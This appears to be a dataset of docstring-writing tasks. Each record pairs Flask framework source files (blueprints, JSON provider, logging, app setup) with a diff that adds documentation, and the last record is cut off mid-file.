app.error_handler_spec[key] = value
for endpoint, func in self.view_functions.items():
app.view_functions[endpoint] = func
extend(self.before_request_funcs, app.before_request_funcs)
extend(self.after_request_funcs, app.after_request_funcs)
extend(
self.teardown_request_funcs,
app.teardown_request_funcs,
)
extend(self.url_default_functions, app.url_default_functions)
extend(self.url_value_preprocessors, app.url_value_preprocessors)
extend(self.template_context_processors, app.template_context_processors)
@setupmethod
def add_url_rule(
self,
rule: str,
endpoint: str | None = None,
view_func: ft.RouteCallable | None = None,
provide_automatic_options: bool | None = None,
**options: t.Any,
) -> None:
if endpoint and "." in endpoint:
raise ValueError("'endpoint' may not contain a dot '.' character.")
if view_func and hasattr(view_func, "__name__") and "." in view_func.__name__:
raise ValueError("'view_func' name may not contain a dot '.' character.")
self.record(
lambda s: s.add_url_rule(
rule,
endpoint,
view_func,
provide_automatic_options=provide_automatic_options,
**options,
)
)
@t.overload
def app_template_filter(self, name: T_template_filter) -> T_template_filter: ...
@t.overload
def app_template_filter(
self, name: str | None = None
) -> t.Callable[[T_template_filter], T_template_filter]: ...
@setupmethod
def app_template_filter(
self, name: T_template_filter | str | None = None
) -> T_template_filter | t.Callable[[T_template_filter], T_template_filter]:
if callable(name):
self.add_app_template_filter(name)
return name
def decorator(f: T_template_filter) -> T_template_filter:
self.add_app_template_filter(f, name=name)
return f
return decorator
@setupmethod
def add_app_template_filter(
self, f: ft.TemplateFilterCallable, name: str | None = None
) -> None:
def register_template_filter(state: BlueprintSetupState) -> None:
state.app.add_template_filter(f, name=name)
self.record_once(register_template_filter)
@t.overload
def app_template_test(self, name: T_template_test) -> T_template_test: ...
@t.overload
def app_template_test(
self, name: str | None = None
) -> t.Callable[[T_template_test], T_template_test]: ...
@setupmethod
def app_template_test(
self, name: T_template_test | str | None = None
) -> T_template_test | t.Callable[[T_template_test], T_template_test]:
if callable(name):
self.add_app_template_test(name)
return name
def decorator(f: T_template_test) -> T_template_test:
self.add_app_template_test(f, name=name)
return f
return decorator
@setupmethod
def add_app_template_test(
self, f: ft.TemplateTestCallable, name: str | None = None
) -> None:
def register_template_test(state: BlueprintSetupState) -> None:
state.app.add_template_test(f, name=name)
self.record_once(register_template_test)
@t.overload
def app_template_global(self, name: T_template_global) -> T_template_global: ...
@t.overload
def app_template_global(
self, name: str | None = None
) -> t.Callable[[T_template_global], T_template_global]: ...
@setupmethod
def app_template_global(
self, name: T_template_global | str | None = None
) -> T_template_global | t.Callable[[T_template_global], T_template_global]:
if callable(name):
self.add_app_template_global(name)
return name
def decorator(f: T_template_global) -> T_template_global:
self.add_app_template_global(f, name=name)
return f
return decorator
@setupmethod
def add_app_template_global(
self, f: ft.TemplateGlobalCallable, name: str | None = None
) -> None:
def register_template_global(state: BlueprintSetupState) -> None:
state.app.add_template_global(f, name=name)
self.record_once(register_template_global)
@setupmethod
def before_app_request(self, f: T_before_request) -> T_before_request:
self.record_once(
lambda s: s.app.before_request_funcs.setdefault(None, []).append(f)
)
return f
@setupmethod
def after_app_request(self, f: T_after_request) -> T_after_request:
self.record_once(
lambda s: s.app.after_request_funcs.setdefault(None, []).append(f)
)
return f
@setupmethod
def teardown_app_request(self, f: T_teardown) -> T_teardown:
self.record_once(
lambda s: s.app.teardown_request_funcs.setdefault(None, []).append(f)
)
return f
@setupmethod
def app_context_processor(
self, f: T_template_context_processor
) -> T_template_context_processor:
self.record_once(
lambda s: s.app.template_context_processors.setdefault(None, []).append(f)
)
return f
@setupmethod
def app_errorhandler(
self, code: type[Exception] | int
) -> t.Callable[[T_error_handler], T_error_handler]:
def decorator(f: T_error_handler) -> T_error_handler:
def from_blueprint(state: BlueprintSetupState) -> None:
state.app.errorhandler(code)(f)
self.record_once(from_blueprint)
return f
return decorator
@setupmethod
def app_url_value_preprocessor(
self, f: T_url_value_preprocessor
) -> T_url_value_preprocessor:
self.record_once(
lambda s: s.app.url_value_preprocessors.setdefault(None, []).append(f)
)
return f
@setupmethod
def app_url_defaults(self, f: T_url_defaults) -> T_url_defaults:
self.record_once(
lambda s: s.app.url_default_functions.setdefault(None, []).append(f)
)
return f | --- +++ @@ -32,6 +32,11 @@
class BlueprintSetupState:
+ """Temporary holder object for registering a blueprint with the
+ application. An instance of this class is created by the
+ :meth:`~flask.Blueprint.make_setup_state` method and later passed
+ to all register callback functions.
+ """
def __init__(
self,
@@ -86,6 +91,10 @@ view_func: ft.RouteCallable | None = None,
**options: t.Any,
) -> None:
+ """A helper method to register a rule (and optionally a view function)
+ to the application. The endpoint is automatically prefixed with the
+ blueprint's name.
+ """
if self.url_prefix is not None:
if rule:
rule = "/".join((self.url_prefix.rstrip("/"), rule.lstrip("/")))
@@ -108,6 +117,57 @@
class Blueprint(Scaffold):
+ """Represents a blueprint, a collection of routes and other
+ app-related functions that can be registered on a real application
+ later.
+
+ A blueprint is an object that allows defining application functions
+ without requiring an application object ahead of time. It uses the
+ same decorators as :class:`~flask.Flask`, but defers the need for an
+ application by recording them for later registration.
+
+ Decorating a function with a blueprint creates a deferred function
+ that is called with :class:`~flask.blueprints.BlueprintSetupState`
+ when the blueprint is registered on an application.
+
+ See :doc:`/blueprints` for more information.
+
+ :param name: The name of the blueprint. Will be prepended to each
+ endpoint name.
+ :param import_name: The name of the blueprint package, usually
+ ``__name__``. This helps locate the ``root_path`` for the
+ blueprint.
+ :param static_folder: A folder with static files that should be
+ served by the blueprint's static route. The path is relative to
+ the blueprint's root path. Blueprint static files are disabled
+ by default.
+ :param static_url_path: The url to serve static files from.
+ Defaults to ``static_folder``. If the blueprint does not have
+ a ``url_prefix``, the app's static route will take precedence,
+ and the blueprint's static files won't be accessible.
+ :param template_folder: A folder with templates that should be added
+ to the app's template search path. The path is relative to the
+ blueprint's root path. Blueprint templates are disabled by
+ default. Blueprint templates have a lower precedence than those
+ in the app's templates folder.
+ :param url_prefix: A path to prepend to all of the blueprint's URLs,
+ to make them distinct from the rest of the app's routes.
+ :param subdomain: A subdomain that blueprint routes will match on by
+ default.
+ :param url_defaults: A dict of default values that blueprint routes
+ will receive by default.
+ :param root_path: By default, the blueprint will automatically set
+ this based on ``import_name``. In certain situations this
+ automatic detection can fail, so the path can be specified
+ manually instead.
+
+ .. versionchanged:: 1.1.0
+ Blueprints have a ``cli`` group to register nested CLI commands.
+ The ``cli_group`` parameter controls the name of the group under
+ the ``flask`` command.
+
+ .. versionadded:: 0.7
+ """
_got_registered_once = False
@@ -162,10 +222,20 @@
@setupmethod
def record(self, func: DeferredSetupFunction) -> None:
+ """Registers a function that is called when the blueprint is
+ registered on the application. This function is called with the
+ state as argument as returned by the :meth:`make_setup_state`
+ method.
+ """
self.deferred_functions.append(func)
@setupmethod
def record_once(self, func: DeferredSetupFunction) -> None:
+ """Works like :meth:`record` but wraps the function in another
+ function that will ensure the function is only called once. If the
+ blueprint is registered a second time on the application, the
+ function passed is not called.
+ """
def wrapper(state: BlueprintSetupState) -> None:
if state.first_registration:
@@ -176,15 +246,59 @@ def make_setup_state(
self, app: App, options: dict[str, t.Any], first_registration: bool = False
) -> BlueprintSetupState:
+ """Creates an instance of :meth:`~flask.blueprints.BlueprintSetupState`
+ object that is later passed to the register callback functions.
+ Subclasses can override this to return a subclass of the setup state.
+ """
return BlueprintSetupState(self, app, options, first_registration)
@setupmethod
def register_blueprint(self, blueprint: Blueprint, **options: t.Any) -> None:
+ """Register a :class:`~flask.Blueprint` on this blueprint. Keyword
+ arguments passed to this method will override the defaults set
+ on the blueprint.
+
+ .. versionchanged:: 2.0.1
+ The ``name`` option can be used to change the (pre-dotted)
+ name the blueprint is registered with. This allows the same
+ blueprint to be registered multiple times with unique names
+ for ``url_for``.
+
+ .. versionadded:: 2.0
+ """
if blueprint is self:
raise ValueError("Cannot register a blueprint on itself")
self._blueprints.append((blueprint, options))
def register(self, app: App, options: dict[str, t.Any]) -> None:
+ """Called by :meth:`Flask.register_blueprint` to register all
+ views and callbacks registered on the blueprint with the
+ application. Creates a :class:`.BlueprintSetupState` and calls
+ each :meth:`record` callback with it.
+
+ :param app: The application this blueprint is being registered
+ with.
+ :param options: Keyword arguments forwarded from
+ :meth:`~Flask.register_blueprint`.
+
+ .. versionchanged:: 2.3
+ Nested blueprints now correctly apply subdomains.
+
+ .. versionchanged:: 2.1
+ Registering the same blueprint with the same name multiple
+ times is an error.
+
+ .. versionchanged:: 2.0.1
+ Nested blueprints are registered with their dotted name.
+ This allows different blueprints with the same name to be
+ nested at different locations.
+
+ .. versionchanged:: 2.0.1
+ The ``name`` option can be used to change the (pre-dotted)
+ name the blueprint is registered with. This allows the same
+ blueprint to be registered multiple times with unique names
+ for ``url_for``.
+ """
name_prefix = options.get("name_prefix", "")
self_name = options.get("name", self.name)
name = f"{name_prefix}.{self_name}".lstrip(".")
@@ -304,6 +418,12 @@ provide_automatic_options: bool | None = None,
**options: t.Any,
) -> None:
+ """Register a URL rule with the blueprint. See :meth:`.Flask.add_url_rule` for
+ full documentation.
+
+ The URL rule is prefixed with the blueprint's URL prefix. The endpoint name,
+ used with :func:`url_for`, is prefixed with the blueprint's name.
+ """
if endpoint and "." in endpoint:
raise ValueError("'endpoint' may not contain a dot '.' character.")
@@ -330,6 +450,18 @@ def app_template_filter(
self, name: T_template_filter | str | None = None
) -> T_template_filter | t.Callable[[T_template_filter], T_template_filter]:
+ """Decorate a function to register it as a custom Jinja filter. The name
+ is optional. The decorator may be used without parentheses.
+
+ The :meth:`add_app_template_filter` method may be used to register a
+ function later rather than decorating.
+
+ The filter is available in all templates, not only those under this
+ blueprint. Equivalent to :meth:`.Flask.template_filter`.
+
+ :param name: The name to register the filter as. If not given, uses the
+ function's name.
+ """
if callable(name):
self.add_app_template_filter(name)
return name
@@ -344,6 +476,18 @@ def add_app_template_filter(
self, f: ft.TemplateFilterCallable, name: str | None = None
) -> None:
+ """Register a function to use as a custom Jinja filter.
+
+ The :meth:`app_template_filter` decorator can be used to register a
+ function by decorating instead.
+
+ The filter is available in all templates, not only those under this
+ blueprint. Equivalent to :meth:`.Flask.add_template_filter`.
+
+ :param f: The function to register.
+ :param name: The name to register the filter as. If not given, uses the
+ function's name.
+ """
def register_template_filter(state: BlueprintSetupState) -> None:
state.app.add_template_filter(f, name=name)
@@ -360,6 +504,20 @@ def app_template_test(
self, name: T_template_test | str | None = None
) -> T_template_test | t.Callable[[T_template_test], T_template_test]:
+ """Decorate a function to register it as a custom Jinja test. The name
+ is optional. The decorator may be used without parentheses.
+
+ The :meth:`add_app_template_test` method may be used to register a
+ function later rather than decorating.
+
+ The test is available in all templates, not only those under this
+ blueprint. Equivalent to :meth:`.Flask.template_test`.
+
+ :param name: The name to register the filter as. If not given, uses the
+ function's name.
+
+ .. versionadded:: 0.10
+ """
if callable(name):
self.add_app_template_test(name)
return name
@@ -374,6 +532,20 @@ def add_app_template_test(
self, f: ft.TemplateTestCallable, name: str | None = None
) -> None:
+ """Register a function to use as a custom Jinja test.
+
+ The :meth:`app_template_test` decorator can be used to register a
+ function by decorating instead.
+
+ The test is available in all templates, not only those under this
+ blueprint. Equivalent to :meth:`.Flask.add_template_test`.
+
+ :param f: The function to register.
+ :param name: The name to register the test as. If not given, uses the
+ function's name.
+
+ .. versionadded:: 0.10
+ """
def register_template_test(state: BlueprintSetupState) -> None:
state.app.add_template_test(f, name=name)
@@ -390,6 +562,20 @@ def app_template_global(
self, name: T_template_global | str | None = None
) -> T_template_global | t.Callable[[T_template_global], T_template_global]:
+ """Decorate a function to register it as a custom Jinja global. The name
+ is optional. The decorator may be used without parentheses.
+
+ The :meth:`add_app_template_global` method may be used to register a
+ function later rather than decorating.
+
+ The global is available in all templates, not only those under this
+ blueprint. Equivalent to :meth:`.Flask.template_global`.
+
+ :param name: The name to register the global as. If not given, uses the
+ function's name.
+
+ .. versionadded:: 0.10
+ """
if callable(name):
self.add_app_template_global(name)
return name
@@ -404,6 +590,20 @@ def add_app_template_global(
self, f: ft.TemplateGlobalCallable, name: str | None = None
) -> None:
+ """Register a function to use as a custom Jinja global.
+
+ The :meth:`app_template_global` decorator can be used to register a function
+ by decorating instead.
+
+ The global is available in all templates, not only those under this
+ blueprint. Equivalent to :meth:`.Flask.add_template_global`.
+
+ :param f: The function to register.
+ :param name: The name to register the global as. If not given, uses the
+ function's name.
+
+ .. versionadded:: 0.10
+ """
def register_template_global(state: BlueprintSetupState) -> None:
state.app.add_template_global(f, name=name)
@@ -412,6 +612,9 @@
@setupmethod
def before_app_request(self, f: T_before_request) -> T_before_request:
+ """Like :meth:`before_request`, but before every request, not only those handled
+ by the blueprint. Equivalent to :meth:`.Flask.before_request`.
+ """
self.record_once(
lambda s: s.app.before_request_funcs.setdefault(None, []).append(f)
)
@@ -419,6 +622,9 @@
@setupmethod
def after_app_request(self, f: T_after_request) -> T_after_request:
+ """Like :meth:`after_request`, but after every request, not only those handled
+ by the blueprint. Equivalent to :meth:`.Flask.after_request`.
+ """
self.record_once(
lambda s: s.app.after_request_funcs.setdefault(None, []).append(f)
)
@@ -426,6 +632,9 @@
@setupmethod
def teardown_app_request(self, f: T_teardown) -> T_teardown:
+ """Like :meth:`teardown_request`, but after every request, not only those
+ handled by the blueprint. Equivalent to :meth:`.Flask.teardown_request`.
+ """
self.record_once(
lambda s: s.app.teardown_request_funcs.setdefault(None, []).append(f)
)
@@ -435,6 +644,9 @@ def app_context_processor(
self, f: T_template_context_processor
) -> T_template_context_processor:
+ """Like :meth:`context_processor`, but for templates rendered by every view, not
+ only by the blueprint. Equivalent to :meth:`.Flask.context_processor`.
+ """
self.record_once(
lambda s: s.app.template_context_processors.setdefault(None, []).append(f)
)
@@ -444,6 +656,9 @@ def app_errorhandler(
self, code: type[Exception] | int
) -> t.Callable[[T_error_handler], T_error_handler]:
+ """Like :meth:`errorhandler`, but for every request, not only those handled by
+ the blueprint. Equivalent to :meth:`.Flask.errorhandler`.
+ """
def decorator(f: T_error_handler) -> T_error_handler:
def from_blueprint(state: BlueprintSetupState) -> None:
@@ -458,6 +673,9 @@ def app_url_value_preprocessor(
self, f: T_url_value_preprocessor
) -> T_url_value_preprocessor:
+ """Like :meth:`url_value_preprocessor`, but for every request, not only those
+ handled by the blueprint. Equivalent to :meth:`.Flask.url_value_preprocessor`.
+ """
self.record_once(
lambda s: s.app.url_value_preprocessors.setdefault(None, []).append(f)
)
@@ -465,7 +683,10 @@
@setupmethod
def app_url_defaults(self, f: T_url_defaults) -> T_url_defaults:
+ """Like :meth:`url_defaults`, but for every request, not only those handled by
+ the blueprint. Equivalent to :meth:`.Flask.url_defaults`.
+ """
self.record_once(
lambda s: s.app.url_default_functions.setdefault(None, []).append(f)
)
- return f+ return f
| https://raw.githubusercontent.com/pallets/flask/HEAD/src/flask/sansio/blueprints.py |
Add docstrings to make code maintainable | from __future__ import annotations
import dataclasses
import decimal
import json
import typing as t
import uuid
import weakref
from datetime import date
from werkzeug.http import http_date
if t.TYPE_CHECKING: # pragma: no cover
from werkzeug.sansio.response import Response
from ..sansio.app import App
class JSONProvider:
def __init__(self, app: App) -> None:
self._app: App = weakref.proxy(app)
def dumps(self, obj: t.Any, **kwargs: t.Any) -> str:
raise NotImplementedError
def dump(self, obj: t.Any, fp: t.IO[str], **kwargs: t.Any) -> None:
fp.write(self.dumps(obj, **kwargs))
def loads(self, s: str | bytes, **kwargs: t.Any) -> t.Any:
raise NotImplementedError
def load(self, fp: t.IO[t.AnyStr], **kwargs: t.Any) -> t.Any:
return self.loads(fp.read(), **kwargs)
def _prepare_response_obj(
self, args: tuple[t.Any, ...], kwargs: dict[str, t.Any]
) -> t.Any:
if args and kwargs:
raise TypeError("app.json.response() takes either args or kwargs, not both")
if not args and not kwargs:
return None
if len(args) == 1:
return args[0]
return args or kwargs
def response(self, *args: t.Any, **kwargs: t.Any) -> Response:
obj = self._prepare_response_obj(args, kwargs)
return self._app.response_class(self.dumps(obj), mimetype="application/json")
def _default(o: t.Any) -> t.Any:
if isinstance(o, date):
return http_date(o)
if isinstance(o, (decimal.Decimal, uuid.UUID)):
return str(o)
if dataclasses and dataclasses.is_dataclass(o):
return dataclasses.asdict(o) # type: ignore[arg-type]
if hasattr(o, "__html__"):
return str(o.__html__())
raise TypeError(f"Object of type {type(o).__name__} is not JSON serializable")
class DefaultJSONProvider(JSONProvider):
default: t.Callable[[t.Any], t.Any] = staticmethod(_default)
"""Apply this function to any object that :meth:`json.dumps` does
not know how to serialize. It should return a valid JSON type or
raise a ``TypeError``.
"""
ensure_ascii = True
"""Replace non-ASCII characters with escape sequences. This may be
more compatible with some clients, but can be disabled for better
performance and size.
"""
sort_keys = True
"""Sort the keys in any serialized dicts. This may be useful for
some caching situations, but can be disabled for better performance.
When enabled, keys must all be strings, they are not converted
before sorting.
"""
compact: bool | None = None
"""If ``True``, or ``None`` out of debug mode, the :meth:`response`
output will not add indentation, newlines, or spaces. If ``False``,
or ``None`` in debug mode, it will use a non-compact representation.
"""
mimetype = "application/json"
"""The mimetype set in :meth:`response`."""
def dumps(self, obj: t.Any, **kwargs: t.Any) -> str:
kwargs.setdefault("default", self.default)
kwargs.setdefault("ensure_ascii", self.ensure_ascii)
kwargs.setdefault("sort_keys", self.sort_keys)
return json.dumps(obj, **kwargs)
def loads(self, s: str | bytes, **kwargs: t.Any) -> t.Any:
return json.loads(s, **kwargs)
def response(self, *args: t.Any, **kwargs: t.Any) -> Response:
obj = self._prepare_response_obj(args, kwargs)
dump_args: dict[str, t.Any] = {}
if (self.compact is None and self._app.debug) or self.compact is False:
dump_args.setdefault("indent", 2)
else:
dump_args.setdefault("separators", (",", ":"))
return self._app.response_class(
f"{self.dumps(obj, **dump_args)}\n", mimetype=self.mimetype
) | --- +++ @@ -17,20 +17,59 @@
class JSONProvider:
+ """A standard set of JSON operations for an application. Subclasses
+ of this can be used to customize JSON behavior or use different
+ JSON libraries.
+
+ To implement a provider for a specific library, subclass this base
+ class and implement at least :meth:`dumps` and :meth:`loads`. All
+ other methods have default implementations.
+
+ To use a different provider, either subclass ``Flask`` and set
+ :attr:`~flask.Flask.json_provider_class` to a provider class, or set
+ :attr:`app.json <flask.Flask.json>` to an instance of the class.
+
+ :param app: An application instance. This will be stored as a
+ :class:`weakref.proxy` on the :attr:`_app` attribute.
+
+ .. versionadded:: 2.2
+ """
def __init__(self, app: App) -> None:
self._app: App = weakref.proxy(app)
def dumps(self, obj: t.Any, **kwargs: t.Any) -> str:
+ """Serialize data as JSON.
+
+ :param obj: The data to serialize.
+ :param kwargs: May be passed to the underlying JSON library.
+ """
raise NotImplementedError
def dump(self, obj: t.Any, fp: t.IO[str], **kwargs: t.Any) -> None:
+ """Serialize data as JSON and write to a file.
+
+ :param obj: The data to serialize.
+ :param fp: A file opened for writing text. Should use the UTF-8
+ encoding to be valid JSON.
+ :param kwargs: May be passed to the underlying JSON library.
+ """
fp.write(self.dumps(obj, **kwargs))
def loads(self, s: str | bytes, **kwargs: t.Any) -> t.Any:
+ """Deserialize data as JSON.
+
+ :param s: Text or UTF-8 bytes.
+ :param kwargs: May be passed to the underlying JSON library.
+ """
raise NotImplementedError
def load(self, fp: t.IO[t.AnyStr], **kwargs: t.Any) -> t.Any:
+ """Deserialize data as JSON read from a file.
+
+ :param fp: A file opened for reading text or UTF-8 bytes.
+ :param kwargs: May be passed to the underlying JSON library.
+ """
return self.loads(fp.read(), **kwargs)
def _prepare_response_obj(
@@ -48,6 +87,20 @@ return args or kwargs
def response(self, *args: t.Any, **kwargs: t.Any) -> Response:
+ """Serialize the given arguments as JSON, and return a
+ :class:`~flask.Response` object with the ``application/json``
+ mimetype.
+
+ The :func:`~flask.json.jsonify` function calls this method for
+ the current application.
+
+ Either positional or keyword arguments can be given, not both.
+ If no arguments are given, ``None`` is serialized.
+
+ :param args: A single value to serialize, or multiple values to
+ treat as a list to serialize.
+ :param kwargs: Treat as a dict to serialize.
+ """
obj = self._prepare_response_obj(args, kwargs)
return self._app.response_class(self.dumps(obj), mimetype="application/json")
@@ -69,6 +122,18 @@
class DefaultJSONProvider(JSONProvider):
+ """Provide JSON operations using Python's built-in :mod:`json`
+ library. Serializes the following additional data types:
+
+ - :class:`datetime.datetime` and :class:`datetime.date` are
+ serialized to :rfc:`822` strings. This is the same as the HTTP
+ date format.
+ - :class:`uuid.UUID` is serialized to a string.
+ - :class:`dataclasses.dataclass` is passed to
+ :func:`dataclasses.asdict`.
+ - :class:`~markupsafe.Markup` (or any object with a ``__html__``
+ method) will call the ``__html__`` method to get a string.
+ """
default: t.Callable[[t.Any], t.Any] = staticmethod(_default)
"""Apply this function to any object that :meth:`json.dumps` does
@@ -99,15 +164,44 @@ """The mimetype set in :meth:`response`."""
def dumps(self, obj: t.Any, **kwargs: t.Any) -> str:
+ """Serialize data as JSON to a string.
+
+ Keyword arguments are passed to :func:`json.dumps`. Sets some
+ parameter defaults from the :attr:`default`,
+ :attr:`ensure_ascii`, and :attr:`sort_keys` attributes.
+
+ :param obj: The data to serialize.
+ :param kwargs: Passed to :func:`json.dumps`.
+ """
kwargs.setdefault("default", self.default)
kwargs.setdefault("ensure_ascii", self.ensure_ascii)
kwargs.setdefault("sort_keys", self.sort_keys)
return json.dumps(obj, **kwargs)
def loads(self, s: str | bytes, **kwargs: t.Any) -> t.Any:
+ """Deserialize data as JSON from a string or bytes.
+
+ :param s: Text or UTF-8 bytes.
+ :param kwargs: Passed to :func:`json.loads`.
+ """
return json.loads(s, **kwargs)
def response(self, *args: t.Any, **kwargs: t.Any) -> Response:
+ """Serialize the given arguments as JSON, and return a
+ :class:`~flask.Response` object with it. The response mimetype
+ will be "application/json" and can be changed with
+ :attr:`mimetype`.
+
+ If :attr:`compact` is ``False`` or debug mode is enabled, the
+ output will be formatted to be easier to read.
+
+ Either positional or keyword arguments can be given, not both.
+ If no arguments are given, ``None`` is serialized.
+
+ :param args: A single value to serialize, or multiple values to
+ treat as a list to serialize.
+ :param kwargs: Treat as a dict to serialize.
+ """
obj = self._prepare_response_obj(args, kwargs)
dump_args: dict[str, t.Any] = {}
@@ -118,4 +212,4 @@
return self._app.response_class(
f"{self.dumps(obj, **dump_args)}\n", mimetype=self.mimetype
- )+ )
| https://raw.githubusercontent.com/pallets/flask/HEAD/src/flask/json/provider.py |
Replace inline comments with docstrings | from __future__ import annotations
import logging
import sys
import typing as t
from werkzeug.local import LocalProxy
from .globals import request
if t.TYPE_CHECKING: # pragma: no cover
from .sansio.app import App
@LocalProxy
def wsgi_errors_stream() -> t.TextIO:
if request:
return request.environ["wsgi.errors"] # type: ignore[no-any-return]
return sys.stderr
def has_level_handler(logger: logging.Logger) -> bool:
level = logger.getEffectiveLevel()
current = logger
while current:
if any(handler.level <= level for handler in current.handlers):
return True
if not current.propagate:
break
current = current.parent # type: ignore
return False
#: Log messages to :func:`~flask.logging.wsgi_errors_stream` with the format
#: ``[%(asctime)s] %(levelname)s in %(module)s: %(message)s``.
default_handler = logging.StreamHandler(wsgi_errors_stream) # type: ignore
default_handler.setFormatter(
logging.Formatter("[%(asctime)s] %(levelname)s in %(module)s: %(message)s")
)
def create_logger(app: App) -> logging.Logger:
logger = logging.getLogger(app.name)
if app.debug and not logger.level:
logger.setLevel(logging.DEBUG)
if not has_level_handler(logger):
logger.addHandler(default_handler)
return logger | --- +++ @@ -14,6 +14,14 @@
@LocalProxy
def wsgi_errors_stream() -> t.TextIO:
+ """Find the most appropriate error stream for the application. If a request
+ is active, log to ``wsgi.errors``, otherwise use ``sys.stderr``.
+
+ If you configure your own :class:`logging.StreamHandler`, you may want to
+ use this for the stream. If you are using file or dict configuration and
+ can't import this directly, you can refer to it as
+ ``ext://flask.logging.wsgi_errors_stream``.
+ """
if request:
return request.environ["wsgi.errors"] # type: ignore[no-any-return]
@@ -21,6 +29,9 @@
def has_level_handler(logger: logging.Logger) -> bool:
+ """Check if there is a handler in the logging chain that will handle the
+ given logger's :meth:`effective level <~logging.Logger.getEffectiveLevel>`.
+ """
level = logger.getEffectiveLevel()
current = logger
@@ -45,6 +56,18 @@
def create_logger(app: App) -> logging.Logger:
+ """Get the Flask app's logger and configure it if needed.
+
+ The logger name will be the same as
+ :attr:`app.import_name <flask.Flask.name>`.
+
+ When :attr:`~flask.Flask.debug` is enabled, set the logger level to
+ :data:`logging.DEBUG` if it is not set.
+
+ If there is no handler for the logger's effective level, add a
+ :class:`~logging.StreamHandler` for
+ :func:`~flask.logging.wsgi_errors_stream` with a basic format.
+ """
logger = logging.getLogger(app.name)
if app.debug and not logger.level:
@@ -53,4 +76,4 @@ if not has_level_handler(logger):
logger.addHandler(default_handler)
- return logger+ return logger
| https://raw.githubusercontent.com/pallets/flask/HEAD/src/flask/logging.py |
Create Google-style docstrings for my code | from __future__ import annotations
import collections.abc as cabc
import inspect
import os
import sys
import typing as t
import weakref
from datetime import timedelta
from functools import update_wrapper
from inspect import iscoroutinefunction
from itertools import chain
from types import TracebackType
from urllib.parse import quote as _url_quote
import click
from werkzeug.datastructures import Headers
from werkzeug.datastructures import ImmutableDict
from werkzeug.exceptions import BadRequestKeyError
from werkzeug.exceptions import HTTPException
from werkzeug.exceptions import InternalServerError
from werkzeug.routing import BuildError
from werkzeug.routing import MapAdapter
from werkzeug.routing import RequestRedirect
from werkzeug.routing import RoutingException
from werkzeug.routing import Rule
from werkzeug.serving import is_running_from_reloader
from werkzeug.wrappers import Response as BaseResponse
from werkzeug.wsgi import get_host
from . import cli
from . import typing as ft
from .ctx import AppContext
from .globals import _cv_app
from .globals import app_ctx
from .globals import g
from .globals import request
from .globals import session
from .helpers import _CollectErrors
from .helpers import get_debug_flag
from .helpers import get_flashed_messages
from .helpers import get_load_dotenv
from .helpers import send_from_directory
from .sansio.app import App
from .sessions import SecureCookieSessionInterface
from .sessions import SessionInterface
from .signals import appcontext_tearing_down
from .signals import got_request_exception
from .signals import request_finished
from .signals import request_started
from .signals import request_tearing_down
from .templating import Environment
from .wrappers import Request
from .wrappers import Response
if t.TYPE_CHECKING: # pragma: no cover
from _typeshed.wsgi import StartResponse
from _typeshed.wsgi import WSGIEnvironment
from .testing import FlaskClient
from .testing import FlaskCliRunner
from .typing import HeadersValue
T_shell_context_processor = t.TypeVar(
"T_shell_context_processor", bound=ft.ShellContextProcessorCallable
)
T_teardown = t.TypeVar("T_teardown", bound=ft.TeardownCallable)
T_template_filter = t.TypeVar("T_template_filter", bound=ft.TemplateFilterCallable)
T_template_global = t.TypeVar("T_template_global", bound=ft.TemplateGlobalCallable)
T_template_test = t.TypeVar("T_template_test", bound=ft.TemplateTestCallable)
def _make_timedelta(value: timedelta | int | None) -> timedelta | None:
if value is None or isinstance(value, timedelta):
return value
return timedelta(seconds=value)
F = t.TypeVar("F", bound=t.Callable[..., t.Any])
# Other methods may call the overridden method with the new ctx arg. Remove it
# and call the method with the remaining args.
def remove_ctx(f: F) -> F:
def wrapper(self: Flask, *args: t.Any, **kwargs: t.Any) -> t.Any:
if args and isinstance(args[0], AppContext):
args = args[1:]
return f(self, *args, **kwargs)
return update_wrapper(wrapper, f) # type: ignore[return-value]
# The overridden method may call super().base_method without the new ctx arg.
# Add it to the args for the call.
def add_ctx(f: F) -> F:
def wrapper(self: Flask, *args: t.Any, **kwargs: t.Any) -> t.Any:
if not args:
args = (app_ctx._get_current_object(),)
elif not isinstance(args[0], AppContext):
args = (app_ctx._get_current_object(), *args)
return f(self, *args, **kwargs)
return update_wrapper(wrapper, f) # type: ignore[return-value]
class Flask(App):
default_config = ImmutableDict(
{
"DEBUG": None,
"TESTING": False,
"PROPAGATE_EXCEPTIONS": None,
"SECRET_KEY": None,
"SECRET_KEY_FALLBACKS": None,
"PERMANENT_SESSION_LIFETIME": timedelta(days=31),
"USE_X_SENDFILE": False,
"TRUSTED_HOSTS": None,
"SERVER_NAME": None,
"APPLICATION_ROOT": "/",
"SESSION_COOKIE_NAME": "session",
"SESSION_COOKIE_DOMAIN": None,
"SESSION_COOKIE_PATH": None,
"SESSION_COOKIE_HTTPONLY": True,
"SESSION_COOKIE_SECURE": False,
"SESSION_COOKIE_PARTITIONED": False,
"SESSION_COOKIE_SAMESITE": None,
"SESSION_REFRESH_EACH_REQUEST": True,
"MAX_CONTENT_LENGTH": None,
"MAX_FORM_MEMORY_SIZE": 500_000,
"MAX_FORM_PARTS": 1_000,
"SEND_FILE_MAX_AGE_DEFAULT": None,
"TRAP_BAD_REQUEST_ERRORS": None,
"TRAP_HTTP_EXCEPTIONS": False,
"EXPLAIN_TEMPLATE_LOADING": False,
"PREFERRED_URL_SCHEME": "http",
"TEMPLATES_AUTO_RELOAD": None,
"MAX_COOKIE_SIZE": 4093,
"PROVIDE_AUTOMATIC_OPTIONS": True,
}
)
#: The class that is used for request objects. See :class:`~flask.Request`
#: for more information.
request_class: type[Request] = Request
#: The class that is used for response objects. See
#: :class:`~flask.Response` for more information.
response_class: type[Response] = Response
#: the session interface to use. By default an instance of
#: :class:`~flask.sessions.SecureCookieSessionInterface` is used here.
#:
#: .. versionadded:: 0.8
session_interface: SessionInterface = SecureCookieSessionInterface()
def __init_subclass__(cls, **kwargs: t.Any) -> None:
import warnings
# These method signatures were updated to take a ctx param. Detect
# overridden methods in subclasses that still have the old signature.
# Show a deprecation warning and wrap to call with correct args.
for method in (
cls.handle_http_exception,
cls.handle_user_exception,
cls.handle_exception,
cls.log_exception,
cls.dispatch_request,
cls.full_dispatch_request,
cls.finalize_request,
cls.make_default_options_response,
cls.preprocess_request,
cls.process_response,
cls.do_teardown_request,
cls.do_teardown_appcontext,
):
base_method = getattr(Flask, method.__name__)
if method is base_method:
# not overridden
continue
# get the second parameter (first is self)
iter_params = iter(inspect.signature(method).parameters.values())
next(iter_params)
param = next(iter_params, None)
# must have second parameter named ctx or annotated AppContext
if param is None or not (
# no annotation, match name
